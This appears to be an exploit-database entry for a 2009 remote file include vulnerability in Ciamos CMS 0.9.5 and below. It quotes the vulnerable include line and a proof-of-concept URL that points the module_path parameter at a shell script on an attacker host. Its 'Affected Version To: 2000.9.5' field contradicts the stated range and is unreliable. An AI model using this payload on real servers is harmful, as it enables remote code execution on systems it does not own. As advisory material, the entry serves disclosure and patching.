header-logo
Suggest Exploit
vendor:
Ciamos CMS
by:
cr4wl3r
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Ciamos CMS
Affected Version From: 0.9.5 and below
Affected Version To: 2000.9.5
Patch Exists: YES
Related CWE: N/A
CPE: a:ciamos:ciamos_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability

Ciamos CMS version 0.9.5 and below is vulnerable to a Remote File Include vulnerability. This vulnerability exists in the 'module_path' parameter of the 'index.php' file in the 'pms' directory. An attacker can exploit this vulnerability by sending a malicious URL in the 'module_path' parameter. This will allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of Ciamos CMS.
Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability
#Download Script      :  http://sourceforge.net/projects/ciamosmodules/files/
#Dork                 :  die("Hacking attempt");  :D
########################################################################
#
#Vuln : ./ciamos/modules/pms/index.php (line 13)
#       <?php
#          include_once($module_path.'include/header.php'); 
#       ?>
#PoC  :  http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt???
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################



   [ Gorontalo / 2009 ]